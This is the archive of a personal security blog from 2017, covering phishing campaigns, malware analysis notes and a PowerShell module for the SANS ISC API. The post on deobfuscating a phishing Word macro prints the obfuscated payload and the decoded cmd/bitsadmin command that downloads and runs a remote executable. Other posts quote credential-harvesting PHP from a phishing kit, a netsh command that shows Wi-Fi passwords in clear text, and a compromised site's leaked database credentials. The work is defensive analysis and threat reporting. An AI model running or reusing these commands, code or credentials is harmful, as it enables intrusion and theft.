neonprimetime security , just trying to help: 2017

Thursday, June 22, 2017

Powershell Module to query the SANS ISC API

I listed to a great #SansAtNight talk at #SANSMinneapolis about the @sans_isc by @johullrich and thought I'd try to help out a little with a stormcenter PS module

The SANS ISC API Powershell module is at my github site

You can use it simply by doing commands like

Import-Module stormcenter
Get-ISCInfocon
Get-ISCHandler
Get-ISCIp 192.192.192.192
and many more

It is querying the SANS ISC API

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Wednesday, June 7, 2017

De-obfuscating Macro from Phish Email

Saw this word doc in an email

Virus Total link

MD5 8cd6cee9d328a0c0fa8d5ddb150cd5e9

Email Subject: XXXX Credit Card Authorization Form

It contained macros that were obfuscated, partial example is below

Sub AutoOpen()
eculso = "85.95.86.32.87.106.87.18.33.85.18.20.105.83.91.102.88.97.100.18.33.102.18.40.18.97.96.91.92.103.18.24.18.84.91.102.101.83.86.95.91.96.18.33.102.100.83.96.101.88.87.100.18.103.102.91.105.98.107.18.33.86.97.105.96.94.97.83.86.18.33.98.100.91.97.100.91.102.107.18.96.97.100.95.83.94.18.90.102.102.98.44.33.33.98.98.87.98.98.87.98.98.87.102.107.32.85.97.95.33.102.102.102.33.36.96.97.100.87.96.32.87.106.87.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.18.24.101.102.83.100.102.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.20"
eculso = ekkule(eculso, ".")
resultString2 = ynoqa(eculso)

....

The string eculso clearly contained the malicious command to be run, so I removed the "run" commands in vb and created a de-obfuscate function reversing their vba code.

Public Function deobfuscate(obfuscated_command)
pass1 = Join(Split(obfuscated_command, "."), "%%")
still_obfuscated_command = Split(Trim(pass1), "%")
resultstr = ""
For counter = 0 To UBound(still_obfuscated_command)
   If Len(still_obfuscated_command(counter)) > 0 Then
    rotate_pass2 = CInt((still_obfuscated_command(counter))) + 10
    rotate_pass3 = Chr((rotate_pass2 + 2) + 2)
    converted_string = Array(resultstr, rotate_pass3)
    resultstr = Join(converted_string, "")
   End If
Next
deobfuscate = resultstr
End Function

Private Sub Document_Open()
obfuscated_command = "85.95.86.32.87.106.87.18.33.85.18.20.105.83.91.102.88.97.100.18.33.102.18.40.18.97.96.91.92.103.18.24.18.84.91.102.101.83.86.95.91.96.18.33.102.100.83.96.101.88.87.100.18.103.102.91.105.98.107.18.33.86.97.105.96.94.97.83.86.18.33.98.100.91.97.100.91.102.107.18.96.97.100.95.83.94.18.90.102.102.98.44.33.33.98.98.87.98.98.87.98.98.87.102.107.32.85.97.95.33.102.102.102.33.36.96.97.100.87.96.32.87.106.87.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.18.24.101.102.83.100.102.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.20"
actual_command = deobfuscate(obfuscated_command)
InputBox "malcode", "infosec", actual_command
End Sub

Which results in the malicious command printed to the a popup for me to view

cmd.exe /c "waitfor /t 6 oniju & bitsadmin /transfer utiwpy /download /priority normal hxxp://ppeppeppety[.]com/ttt/2noren.exe %appdata%\ynenm.exe &start %appdata%\ynenm.exe"

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Random Strings XML notes

Random notes on running strings and finding xml

If you see something like ...
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
   <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
     <requestedPrivileges>
      <requestedExecutionLevel level='asInvoker' uiAccess='false' />
     </requestedPrivileges>
    </security>
   </trustInfo>
</assembly>
It could be a Visual Basic Manifest that specifies a requested execution level (default is asInvoker), and for example could specify a requested execution level of highestAvailable or requireAdministrator.

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Random PEiD notes

Random PEiD notes.

Packers ASProtect 2.1x SKE -> Alexey Solodovnikov =

Others

Borland Delphi 6.0 - 7.0 =

Microsoft Visual C++ 6.0 =

Nothing found * =

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Random Windows Executable Dependency Notes

Random windows executable dependency notes.
Windows API reference

ADVAPI32.dll = part of an advanced API services library supporting numerous APIs including many security and registry calls

    @ CreateServiceA = create a new windows service, can be used for persistence

    @ RegCreateKeyExA = create or open registry key, can be used for persistence

    @ GetSetValueExA = set registry value, can be used for persistence

    @ StartServiceA = start a windows service, can be used for persistence

AUTHZ.dll = responsible for component Authorization Framework for Windows systems

    @ AuthzInitializeContextFromSid = creates a user-mode client context from a user security identifier (SID)

COMCTL32.dll = module that contains common GUI components used by Windows applications

COMDLG32.dll = module that contains Common dialog boxes used by Windows applications, such as the standard Open File form

    @ GetOpenFileNameA = open file dialog box

    @ GetSaveFileNameA = save file dialog box

CRYPTBASE.dll = responsible for component Base cryptographic API DLL for Windows

GDI32.dll = library that implements the GDI subsystem, where primitive graphical operations are performed

IPHLPAPI.dll = module containing the functions used by the Windows IP Helper API

    @ GetAdaptersInfo = gets info on the network adapters of the system

    @ GetIfTable = enumerates physical interfaces on system

KERNEL32.dll = Windows operating system kernel

    @ CreateFileA = create an ASCII file, can be used to drop a file

    @ CreateMutexA = create a mutex (mutually exclusive object), can be used to avoid infecting the system more than once & to coordinate communications among multiple components

    @ CreateProcessA = create a process, can be used to execute a program

    @ CreateThread = create a process, can be used to generate child process

    @ ExpandEnvironmentStringsA = get an environment variable

    @ GetModuleFileNameA = gets the name of the a module/dll already loaded

    @ GetModuleHandleA = get an existing module/dll

    @ GetProcAddress = get address of an exported function

    @ GetSystemInfo = get info about the system

    @ LoadLibraryA = load a module/dll, can be used to inject into processes

    @ LoadLibraryW = load a module/dll, can be used to inject into processes

    @ VirtualAlloc = reserves memory in the calling process

    @ WriteExe = same as CreateProcess but for 16bit compatibility, can be used to execute a program

    @ WriteFile = write to a file, can be used to drop a file

KERNELBASE.dll = system file of Windows Operating System, which serves various Windows applications and services, kinda like a second generation of kernel32.dll

MFC42.DLL = module that contains the Microsoft Foundation Classes (MFC) functions

    @ WNetAddConnection2W = makes a connection to a network resource and can redirect a local device to the network resource

    @ WNetGetConnection2W = retrieves the name of the network resource associated with a local device

    @ WNetUseConnection2W = makes a connection to a network resource. The function can redirect a local device to a network resource

MPR.DLL = module containing functions used to handle communication between the Windows operating system and the installed network providers

MSVCP60.dll = standard C library functions such as printf, memcpy, and cos

MSVCRT.DLL = the C standard library for the Visual C++ (MSVC) compiler

    @ fopen = open a file

    @ memmove = overwrite memory

NDDEAPI.DLL = Windows for Workgroups DDE (Dynamic Data Exchange) Share Interface, no longer supported

    @ NDdeShareEnumA = retrieves available shares

NETAPI32.DLL = module that contains the Windows NET API used by applications to access a Microsoft network

    @ NetLocalGroupAddMembers = adds an account to a group, can be used for persistence

    @ NetUserAdd = adds a new account, can be used for persistence

NTDSAPI.DLL = module that contains a set of COM interfaces used to access the capabilities of directory services from different network providers

    @ DsServerRegisterSpnA = function either registers or unregisters the SPNs (service prinicpal names)

OLE32.dll = part of the object linking and embedding technology, or OLE

    @ CreateBindCtx = returns object with info about a particular COM linking moniker

OLEAUT32.dll = library used in Microsoft for OLE (Object linking and embedding) technologies; OLE Automation

PSAPI.dll = Process Status Helper file used by Windows to collate information and files about all your software & drivers on your PC

    @ EnumProcesses = Retrieves the process identifier for each process object in the system

    @ EnumProcessModules = Retrieves a handle for each module in the specified process

RPCRTREMOTE.dll = process which is responsible for component Remote RPC Extension for Windows

RSAENH.dll = module that implements the Microsoft enhanced cryptographic service provider (CSP)

    @ CPCreateHash = creates and initializes a new hash object

    @ CPDecrypt = Decrypt data

SHELL32.dll = Windows Shell API functions, which are used when opening web pages and files

    @ SHBrowseForFolderA = Displays a dialog box that enables the user to select a folder

    @ ShellExecuteA = performs an operation on a file like open, find, and explore

SHFOLDER.dll = contains functions regarding Windows special folders such as My Documents

    @ SHGetFolderPathA = can be used to return folder paths like user's AppData

SHLWAPI.dll = library which contains functions for UNC and URL paths, registry entries, and color settings

    @ SHDeleteKeyA = deletes a registry key and all descendants

URLMON.dll = module that contains functions used by Microsoft OLE (Object Linking and Embedding)

    @ UrlDownloadToFileA = Downloads bits from the Internet and saves them to a file, can be used to download payload

USER32.dll = used for windowing and other interactive user program tasks

    @ CreateWindowExA = open a new window

    @ DrawIcon = draw an icon or cursor

    @ EnableWindow = enable mouse and keyboard input in a window

    @ PeekMessageA = looks at incoming message to a window

    @ PostMessageA = sends message to a window

    @ RegisterClassExA = registers a class in relation to a window

    @ SetFocus = sets focus on a window

    @ SetWindowsHookEx = popular way keyloggers receive keyboard inputs

USERENV.dll = module that contains application programming interface (API) functions to create and manage user profiles

    @ LoadUserProfileW = Loads the specified user's profile. The profile can be a local user profile or a roaming user profile

USP10.dll = module that contains a collection of application programming interface (API) functions that enable a text layout client to format complex scripts

VERSION.dll = module that contains application programming interface (API) functions used for Windows version checking

WININET.dll = module that contains Internet-related functions used by Windows applications

    @ InternetOpenA = Initializes an application's use of the WinINet functions

    @ InternetOpenUrlA = Opens a resource specified by a complete FTP or HTTP URL

    @ InternetReadFile = Reads data from a handle opened by the InternetOpenUrl, FtpOpenFile, or HttpOpenRequest

    @ FindNextUrlCacheEntryA = Retrieves the next entry in the Internet cache

    @ DeleteUrlCacheEntry = Removes the file from the cache

WINNM.dll = module for the Windows Multimedia API, which contains low-level audio and joystick functions

WS2_32.dll = Windows Sockets API used by most Internet and network applications to handle network connections

    @ WSAloctl = controls the mode of a socket

    @ WSASocketA = creates a new socket

WSOCK32dll = just a wrapper for the actual winsock ws2_32.dll, windows sockets api

    @ gethostbyname = lookup ip of host

    @ send = send data thru socket

    @ socket = create a socket

    @ WSAStartup = initiates use of the Winsock DLL by a process

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Tuesday, April 18, 2017

ShadowBrokers EquationGroup Compilation Timestamp Observation

I looked at the IOCs @GossiTheDog ‏posted, looked each up in virus total and dumped the compilation timestamp into a spreadsheet.

To step back a second, the Microsoft Windows compiler embeds the date and time that the given .exe or .dll was compiled. Compilation time is a very useful characteristic of Portable Executable. Malware authors could zero it or change it to a random value, but I'm not sure there is any indication of that here. If the compilation timestamps are real, then there's an interesting observation in this dataset.

Virus total shows you this value for example.

If you notice, the files in the dump range from 11/2009 to 8/2013.

And if you throw it into a pretty little graph you see a possible timeline of exploit creation.

Just an observation.

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Wednesday, April 12, 2017

Collection of Google Docs Phishes seen by @neonprimetime

Below is a timelined Collection of DropBox Phishes seen by @neonprimetime

Seen Live on: 4/12/2017
Url: hxxp://drcherian.com/alert/GD/
Folder: alert/SD
Page: Default
Source: PhishTank.com
Meta Page Title: Google Docs
Meta Page Author: None
Post page(s): Default

Seen Live on: 4/12/2017
Url: hxxp://drcherian.com/kingssss/GD/
Folder: kingssss/SD
Page: Default
Source: PhishTank.com
Meta Page Title: Google Docs
Meta Page Author: None
Post page(s): Default

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Collection of Yahoo Phishes seen by @neonprimetime

Below is a timelined Collection of Yahoo Phishes seen by @neonprimetime

Seen Live on: 4/12/2017
Url: hxxp://ehncsopiik.club/bt/
Folder: bt
Page: Default
Source: PhishTank.com
Meta Page Title: Login - BT Yahoo!
Meta Page Author: None
Post page(s): form2mail2.php

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Collection of DropBox Phishes seen by @neonprimetime

Below is a timelined Collection of DropBox Phishes seen by @neonprimetime

Seen Live on: 4/12/2017
Url: hxxp://devux[.]com[.]mx/drpbox/file/files/db/file.dropbox/
Folder: db/file.dropbox
Page: Default
Source: PhishTank.com
Meta Page Title: Dropbox - Sign in
Meta Page Author: None
Post page(s): submit.php

Seen Live on: 4/12/2017
Url: hxxp://vitrinedascompras[.]com[.]br/dropbox/Dropbox/doc-login/
Folder: DropBox/doc-login
Page: Default
Source: PhishTank.com
Meta Page Title: Dropbox - Sign in
Meta Page Author: None
Post page(s): dropbox.php

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Collection of Capital One Phishes seen by @neonprimetime

Below is a timelined Collection of Capital One Phishes seen by @neonprimetime

Seen Live on: 3/22/2017
Url: hxxp://capitalone[.]com[.]maxonpaving[.]com/logon/ , hxxp://www[.]pecport[.]pw/c.html
Folder: logon , None
Page: Default , c.html
Source: @neonprimetime
Meta Page Title: Did not record it
Meta Page Author: Did not record it
Post page(s): Did not record it

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Collection of WeTransfer Phishes seen by @neonprimetime

Below is a timelined Collection of WeTransfer Phishes seen by @neonprimetime

Seen Live on: 4/10/2017
Url: hxxps://alkhidmattour[.]com/BNB/WeTransfer/index.html
Folder: BNB/WeTransfer
Page: index.html
Source: @demonslay335
Meta Page Title: Empty
Meta Page Author: None
Post page(s): en.php, login.php, phone.php

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Somebody Sent out a Phish/Spam Template instead of the Phish

Saw this email. I would guess the attacker sent out the phish/spam template instead of the actual phish/spam!

From: alex@shedbar.com.br
To:
Date: 04/12/2017
Subject: {Say|Tell} No To {Fat|Being Fat}: {Act Now|Act Fast} & Get {Instant|Quick|Incredible|Fantastic|Marvelous|Outstanding} Results

{Having|Getting} the {body of you dreams|slim body|fit body|beach body} is {easier|much easier} than you {think|always thought|thought}, {all thanks to|thanks to|with the help of} the {correct|right|low carb} {diet|diet program|diet plan|nutrition plan|nutrition program}, {good|regular} {workout|gym workouts|workouts} and this {amazing|exclusive|revolutionary|advance|spectacular} {product|supplement|solution} that will {help you|allow you to|give you a chance to|give you an opportunity to|give you a possibility to} achieve {instant|quick|incredible|fantastic|marvelous|outstanding} results.
{Incredible|Revolutionary|Exceptional|Phenomenal|Outstanding|Glorious|Brilliant|Rapid-acting|Fast-acting} {product|supplement|solution} {working|suitable} for {all body types|types of bodies} has proven to {bring fast|show incredible|show fantastic|show quick|show jaw-dropping} results, {motivate|give motivation} for {ongoing|further} {weight reduction|weight loss}, improve {mood|your mood}, {reduce|decrease} appetite and {bring|provide} {all|other|many other} {positive|beneficial|great} effects.
{With the help of|Thanks to its} {exclusive|advanced|amazing|marvelous|unique|one-of-a-kind} formula {developed|created} {in collaboration|together} by {Japanese|German} and American {nutritionists|dietologists|scientists}, your {beach|fit|slim|dream} body is {only one click|one link} away, what are you waiting for?

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Sunday, April 9, 2017

Collection of Facebook Phishes seen by @neonprimetime

Below is a timelined Collection of Facebook Phishes seen by @neonprimetime

Seen Live on: 4/12/2017
Url: hxxp://facebook.notjustcoded.com/pc/fblog.html
Folder: pc
Page: fblog.html
Source: PhishTank.com
Meta Page Title: Facebook - Log In or Sign Up
Meta Page Author: None
Post page(s): sege.php

Seen Live on: 4/9/2017
Url: hxxp://usrecoverpgs65[.]esy[.]es/
Folder: None
Page: Default
Source: PhishTank.com
Meta Page Title: Facebook
Meta Page Author: None
Post page(s): others.php

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Collection of Paypal Phishes seen by @neonprimetime

Below is a timelined Collection of Paypal Phishes seen by @neonprimetime

Seen Live on: 4/12/2017
Url: hxxp://ga2017[.]com/misc/wp.php
Folder: misc
Page: wp.php
Source: @malware_traffic
Meta Page Title: Log in to your PɑyPɑl ɑccount
Meta Page Author: None
Post page(s): wp.php

Seen Live on: 4/9/2017
Url: hxxp://www.paypal[.]com[.]cgi-bin.w3bscrcmd222f91e14e61be374f236df6bd32e71434.456b6064cc4ba375cc0d415be95807ecdeed6789.2488b2cc5808b734242446e29e5e0ca8.5555b2aa5708b14344143e29e51011.gurame.com.sg/.string/w3b.login.cmd/
Folder: w3b.login.cmd
Page: Default
Source: PhishTank.com
Meta Page Title: Log in to your PayPal account
Meta Page Author: DecrypteD
Post page(s): inc/visit.php , inc/login.php

Seen Live on: 4/9/2017
Url: hxxp://opthimpro[.]ru/RU/support/9f22ee9c5bc81fc8c71373bc861d0bbeZDZmOTI1MDEzZWZmOWUxNjA0N2IwOTZjNjI1MzNhZWU=/myaccount/websc_verification/
Folder: websc_verification
Page: Default
Source: PhishTank.com
Meta Page Title: Empty
Meta Page Author: None
Post page(s): Templates/MO_VBV.php

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

WordPress sites redirecting to Weight Loss Product Site, Pharma Hack

NOTE: All Links below were active & working as of 4/9/2017

Have seen a bunch of spammy looking emails with subject line similar to

Incredible Formula Is Now Available For Everybody

All from random sender emails such as

mlhernandez@bolivar.gov.co
py10024@dongshin.net
kd-dovitec@vnn.vn

With email bodies like this with a hyperlink on the last line

Tsss... Though this exclusive product is already out there for everybody on the web, the amount is very limited, so don't tell your friends about it until you get some first.
Advanced solution and redesigned formula has been created to help you get rid of excessive weight. Natural ingredients and secret components are exactly what you need to get back in a great shape and get your dream body.
Act now as next week it will already be too late. Get a beautiful and fit body like you deserve.

The hyperlink went to sites like this that appear to be probably outdated hacked wordpress sites with unpatched plugins

hxxp://klkgraphics[.]com/wordpress_d/wp-includes/SimplePie/lib.php?c2JyeWFuQG9zaGtvc2hjb3JwLmNvbQ==
hxxp://www.sandeepguptagmatclasses[.]com/wp-admin/css/dump/db.php?aGxvdWRlbkBkZWZlbnNlLm9zaGtvc2hjb3JwLmNvbQ==
hxxp://unlimitedsuccesscoaching[.]com/wp-includes/SimplePie/Decode/old.php?dG1vcnJpc0BqbGcuY29t
hxxp://covrefugee[.]org/wp-includes/SimplePie/Decode/lib.php?bGdhbGxhY2hlckBqbGcuY29t
hxxp://www.libertywebcreation[.]com/norfolk/wp-includes/fonts/ini.php?dGxiaWdoYW1AamxnLmNvbQ==

If the user clicks on any of those links the site simply redirects to this 1 single site, thus it's likely the attacker is the same for each site

hxxp://dietokdlikefut[.]com/us/emko/t11-cla?bhu=CX2zrXTTggnGsfMQaDHNS2ZNVZWHVGZRYhPiX

The Page title on that page is

Gwen Stefani Shares Blake Shelton's Secret To Rapid Weight Loss (Pics Below)

No matter where you click on that page All links go to this follow-up url

hxxp://dietokdlikefut[.]com/us/emko/go.php?CID=313491&bhu=CX2zrXTTggnGsfMQaDHNS2ZNVZWHVGZRYhPiX

If you decide you want to buy the product, clicking checkout goes to this page

hxxps://checkout-cla-extract[.]com/?click_id=04_29517092_5bcca100-2e0d-4262-a3d7-a225b73ac143&subid1=313491&netid=3&ver=old&ad=1kN9

Also found it interesting at any point on the fake sales pitch page if you remove the php file name it redirects you to a random sub-domain that contains the exact same content

hxxp://557-healthandbeauty.dietokdlikefut[.]com/us/xvoh/cla-safflower-oil/
hxxp://852-diet.dietokdlikefut[.]com/us/hefk/cla-safflower-oil/
hxxp://110-health.dietokdlikefut[.]com/us/lldl/cla-safflower-oil/

Looks to me similar to past Pharma Hacks that I've seen where attacker is simply going around hacking weak wordpress sites in order to both bump up their search engine rankings and also simply generate traffic to their website to make money.

Let me know if I'm missing anything else important.

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Monday, March 20, 2017

Fattura Invoice PDF zip exe that uses eMailExtractor

So I'm still learning at this, but I thought I'd walk through my thought process and see if anybody wanted to explain what I did right or wrong :-) A few days ago there was this link

hxxp://www[.]coccorullo[.]it/fattura/Fattura_49922pdf.zip

When extracted you ended up with

0843d52e1df49221a095fbdd0bc4a2cb Fattura_49922pdf.exe

I believe per google translate that Fattura = Invoice so this was likely part of some Phishing email masquerading as an Invoice.

When I ran strings I saw text that seemed to indicate a different program called emailExtractor

When I ran objdump I saw text that seemed to indicate this file was perhaps originally named eMailExtractor.exe

After a google search I came up with this site hxxps://www[.]maxprog[.]com/site/software/internet-marketing/email-extractor_sheet_us.php

So my thoughts were either a.) This is just the legit software and Virus Total screaming cause it's crap ad-loaded junk or b.) perhaps the attacker just renamed or made it look like legit software in order to throw off security researchers or perhaps c.) something more is going on here, like maybe the attacker modified this eMailExtractor.exe for his evil bidding, and made it so that when the user executes, it will "collect all emails on his computer" and then send them back to the attacker somehow. An email Harvester.

Thoughts?

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Friday, March 3, 2017

netsh for clear text wifi password

I thought this Dmitry Kulshitsky blog was it was interesting, and the fact you can type the following command

netsh wlan show profile name="MyTestWifi" key=clear

And it displays in clear text the password! (under Security settings -> Key Content)

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Tuesday, February 21, 2017

Customs Banned Goods Adobe Phish

Adobe Phish

From: "CUSTOMS SERVICES"

Attachment: BANNED GOODS.html (md5 e1e0e1d1720dbcc536c2f596d76627d9 , Virus Total has 19/55)

Body: PLEASE FIND THE ATTACHED LIST OF NEWLY BANNED GOODS BY THE GOVERNMENT

Open the attachment and see this pretty convincing page (pic below) with nice background that makes it look like you're in Adobe Reader instead of a browser

It contain the following ...

alert .... Document is Highly Secured by Microsoft INC. Requires Email Authentication: Kindly Sign in with your correct email and password to view Document
title ... PDF Online
form method ... POST ... action= hxxp://send.akataali[.]us/pdnew.php

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Saturday, February 18, 2017

Phishing Site with Search Engine Detection

Continuing discussing @Techhelplistcom's post a dhl/stripe phish site

hxxp://bitadze[.]ge/wp-includes/

The http.zip file also contained X-x-X.php which appears to be search engine/bot/crawler detection ... in theory returns 404 not found for search engines trying to index the site and 200 success for the victims. The idea probably being that they don't want their pages to show up in search engines, they want them hidden from the internet except for when they send out their links in phishing emails. Probably extends the lifetime and thus success rate of their phishing campaign.

Full code here

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Attacker Emailed himself your Phished Credentials

@Techhelplistcom posted a dhl/stripe phish site

hxxp://bitadze[.]ge/wp-includes/

The site was still wide open so you could view the http.zip file and in particular under the stripe phish the tfo.php file which is a good example of visibility behind the scenes to see what an attacker is doing with your phished credentials after you enter your data in and click submit on their malicious site

As you can see the attacker grabs your ip address

$ip = $_SERVER['REMOTE_ADDR'];

What browser you're using

$useragent = $_SERVER['HTTP_USER_AGENT'];

Your email & password

$message .= "EMAIL : ".$_POST['1KDL23']."\n";
$message .= "PASSWORD : ".$_POST['FZ32FEZ2345']."\n";

and sends it to himself

$send="fastpay147@gmail.com";

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Wordpress Config as homepage

@wavellan posted a spam and phishing url.

hxxp://enerjietudu[.]com/

Interesting if you browse to the homepage you get returned the wp-config.php file

Full contents here

And like every good wp-config.php file it contains information such as

define('DB_NAME', 'enerjik3460');
define('DB_USER', 'enerjik34');
define('DB_PASSWORD', 'energy34');
define('DB_HOST', '94.73.144.196');

And all the encryption deets

define('AUTH_KEY', ...
define('SECURE_AUTH_KEY',
define('LOGGED_IN_KEY',
define('NONCE_KEY',
define('AUTH_SALT',
define('SECURE_AUTH_SALT',
define('LOGGED_IN_SALT',
define('NONCE_SALT', ...

All the comments are in Turkish per google translate.

The bottom has an error showing the full path we are sitting in

Fatal error: Call to undefined function wp() in /home/enerjietudu.com/httpdocs/wp-blog-header.php on line 22

I notice that no matter which page I go to (wp-admin/admin.php, etc.) the wp-config.php contents show and an error is thrown.

If I had to guess I think somebody hacked this wordpress site by finding a vulnerability in the wordpress blog header, they found some vulnerability that outputs the content of a file, and so of course they chose the wp-config.php file, and now it's being displayed in the header of every page you navigate to. Then they used that output to login and take control of the database and then were able to use the database to write files to the www root folder and use it in phishing campaigns.

I don't claim to know everything, I'm just guessing. Anybody want to explain what really happened? Thanks!

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Thursday, February 16, 2017

Cerber payload generator with different hashes

@MlwrHpstr posted a cerber url

freeflamec[.]top/read.php?f=1.gif

If you go directly to the link it'll download a file

If you run md5sum on the file you'll get a hash

c27b380afa8e88d2eba7c58a97d31be1

If you search that md5 on virus total

Which shows you some interesting details about it

If you run strings you'll see this is no php file, this is no .gif file, this is a windows executable

Something else interesting is that this web server read.php script is setup to only serve certain parameter values. If you try to pass in something like 2.gif instead of 1.gif you get an http 200 but no file.

If you try to leave the f parameter empty, you actually get a file but it's 0 bytes and empty

Thus I would venture to guess there are other parameter values you could pass that may serve up different payloads.

Also if you go to the root of the site they have it redirecting to godaddy.com so this is not a compromised site, it's simply a site setup with malicious purposes to serve certain hidden payloads.

If you type in any random php page name that doesn't exist you'll be able to tell the web server version it's running ( Apache/2.2.15 (CentOS) Server )

Poking around found another page that works (admin.php instead of read.php)

Which delivers a different payload with different hash ( 6ab4bfd0fa555fc570188af13409a669 ) which gives different virus total hits, another EXE

Actually it's interesting, this php file generates random cerber EXEs with different hashes every time you re-load it.

Good example of why signature based tools like AV are dying, because of stuff like this that is probably the same exact payload just slightly modified so that the hash changes every time.

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Apple Phish

@illegalFawn posted some phishing sites.

One of them was hxxp://login-memberupdated[.]info/appleid.apple.com

If you view source, there's not much there because they're trying to obfuscate and avoid detection by various security tools.

On the top it's interesting, looks like the phish likely involves collecting the user's credit cards.

On the bottom you see some ugly encrypted variables and then a call to Aes.Ctr.decrypt to decrypt it. To determine what this is, you can save the assets/js/enc.js file, append to the bottom of it the 3 variables (hea2p, hea2t, and output) and put html and script tags around, then load save as a .html file, so you've created a safe benign html file that creates some variables but doesn't actually execute or write anything to the page.

Then load that html file locally in your browser. Notice the page will load as a blank white page, but that's ok. Then hit f12, go into developer tools, go to the console, type 'output' to display the contents of the output variable.

Now if you're familiar with HTML you can quickly see it's the apple phish page that we saw in our first screenshot. You'll see an iframe used for loading the signin page content.

If you were to login to that page you would find the username, password fields, login button, and php page that the login is posted to. That is going to be the page harvesting the credentials.

If you were to enter your credentials, the phish tells you your account is locked and you must unlock it.

Now we get sent to a verify page ( Verify.php ) which wants us to enter in all kinds of personal info.

Including as we already assumed from above based on the javascript credit card filtering, it asks for your credit card number.

If you enter all your personal info if will say account verified (and in this case apparently a php error) ... then redirect you back to the real appleid login page.